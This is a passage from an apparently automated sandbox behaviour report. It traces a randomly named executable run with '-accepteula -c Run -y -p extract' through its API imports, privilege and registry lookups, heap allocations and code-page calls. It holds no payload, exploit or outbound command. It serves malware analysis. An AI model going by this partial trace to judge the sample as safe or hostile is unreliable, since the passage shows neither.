AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 724 os_tid = 0xa84 Thread: id = 737 os_tid = 0xa34 Thread: id = 743 os_tid = 0x364 Process: id = "188" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x2e0a9000" os_pid = "0x64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "140" os_parent_pid = "0x24c" cmd_line = "tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 729 os_tid = 0x6a0 [0193.739] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0193.740] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0193.740] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0193.740] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0193.740] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0193.741] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0193.741] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0193.741] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0193.741] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0193.741] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0193.741] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0193.742] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0193.742] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0193.742] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0193.742] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0193.742] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0193.743] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0193.743] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0193.743] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0193.743] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0193.743] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0193.744] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0193.744] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0193.744] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0193.744] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0193.744] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0193.745] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0193.745] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0193.745] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0193.745] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0193.745] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0193.746] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0193.746] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0193.746] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0193.746] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0193.746] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0193.746] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0193.747] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0193.747] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0193.747] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0193.747] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0193.747] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0193.747] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0193.748] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0193.748] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0193.748] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0193.748] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0193.748] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0193.748] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0193.749] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0193.749] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0193.749] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0193.749] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0193.749] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0193.750] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0193.750] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0194.007] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0194.007] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0194.007] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0194.007] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0194.007] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0194.008] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0194.008] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0194.008] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0194.008] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0194.008] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0194.008] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0194.009] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0194.009] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0194.009] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0194.009] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0194.010] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0194.010] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0194.010] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0194.010] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0194.010] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0194.011] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0194.011] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0194.011] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0194.011] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0194.011] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0194.011] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0194.012] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0194.012] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0194.012] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0194.012] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0194.012] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0194.012] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0194.012] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0194.013] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0194.013] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0194.013] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0194.013] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0194.013] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0194.013] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0194.013] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0194.014] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0194.014] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0194.014] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0194.014] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0194.014] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0194.014] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0194.015] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0194.015] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0194.015] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0194.015] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0194.015] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0194.016] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0194.016] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0194.016] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0194.016] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0194.016] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0194.016] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0194.016] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0194.016] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0194.016] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0194.017] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0194.017] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0194.017] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0194.017] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0194.017] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0194.017] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0194.017] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0194.017] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0194.018] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0194.018] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0194.018] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0194.019] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0194.019] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x2cbd9c60, dwHighDateTime=0x1d68287)) [0194.019] GetCurrentThreadId () returned 0x6a0 [0194.019] GetCurrentProcessId () returned 0x64 [0194.020] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=31435851343) returned 1 [0194.025] GetProcessHeap () returned 0x630000 [0194.032] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0194.032] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0194.033] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0194.033] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0194.033] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0194.033] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0194.033] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0194.034] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0194.034] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0194.034] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0194.034] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0194.034] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0194.035] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0194.035] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0194.035] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0194.035] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0194.035] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0194.036] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0194.036] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0194.036] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0194.036] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0194.037] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0194.037] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0194.037] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0194.037] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0194.037] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0194.037] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0194.037] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0194.038] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0194.038] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0194.038] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0194.038] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0194.038] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0194.039] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0194.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3bc) returned 0x647090 [0194.040] GetCurrentThreadId () returned 0x6a0 [0194.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x647458 [0194.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x800) returned 0x647478 [0194.040] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x7cd21ed7, hStdError=0x0)) [0194.041] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0194.041] GetFileType (hFile=0x3) returned 0x2 [0194.245] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0194.245] GetFileType (hFile=0x7) returned 0x2 [0194.246] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0194.246] GetFileType (hFile=0xb) returned 0x2 [0194.246] GetCommandLineW () returned="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" [0194.247] GetEnvironmentStringsW () returned 0x647c80* [0194.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb7c) returned 0x648808 [0194.250] FreeEnvironmentStringsW (penv=0x647c80) returned 1 [0194.250] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0194.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x94) returned 0x647c80 [0194.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0xa0) returned 0x647d20 [0194.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3e) returned 0x644dc0 [0194.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x6c) returned 0x647dc8 [0194.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x6e) returned 0x647e40 [0194.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x78) returned 0x63f8f0 [0194.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x62) returned 0x647eb8 [0194.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2e) returned 0x647f28 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x48) returned 0x647f60 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x20) returned 0x646a60 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x28) returned 0x647fb0 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1a) returned 0x646a88 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x4a) returned 0x647fe0 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x72) returned 0x63f970 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x30) returned 0x648038 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2e) returned 0x648070 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1c) returned 0x646ab0 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0xd2) returned 0x6480a8 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x7c) returned 0x648188 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x36) returned 0x648210 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3a) returned 0x644e08 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x90) returned 0x648250 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x24) returned 0x6482e8 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x30) returned 0x648318 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x36) returned 0x648350 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x48) returned 0x648390 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x52) returned 0x6483e0 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3c) returned 0x644e50 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x18) returned 0x648440 [0194.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x82) returned 0x648460 [0194.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2e) returned 0x6484f0 [0194.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1e) returned 0x646ad8 [0194.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2c) returned 0x648528 [0194.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x54) returned 0x648560 [0194.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x52) returned 0x6485c0 [0194.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2a) returned 0x648620 [0194.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3c) returned 0x644e98 [0194.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x54) returned 0x648658 [0194.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x24) returned 0x6486b8 [0194.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x30) returned 0x6486e8 [0194.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x8c) returned 0x648720 [0194.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x648808 | out: hHeap=0x630000) returned 1 [0194.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x800) returned 0x6487b8 [0194.275] GetLastError () returned 0x0 [0194.275] SetLastError (dwErrCode=0x0) [0194.275] GetLastError () returned 0x0 [0194.275] SetLastError (dwErrCode=0x0) [0194.275] GetLastError () returned 0x0 [0194.276] SetLastError (dwErrCode=0x0) [0194.276] GetACP () returned 0x4e4 [0194.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x220) returned 0x648fc0 [0194.276] GetLastError () returned 0x0 [0194.276] SetLastError (dwErrCode=0x0) [0194.276] IsValidCodePage (CodePage=0x4e4) returned 1 [0194.276] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0194.276] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0194.278] GetLastError () returned 0x0 [0194.278] SetLastError (dwErrCode=0x0) [0194.278] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0194.765] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0194.765] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0194.765] GetLastError () returned 0x0 [0194.765] SetLastError (dwErrCode=0x0) [0194.765] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0194.765] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0194.765] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 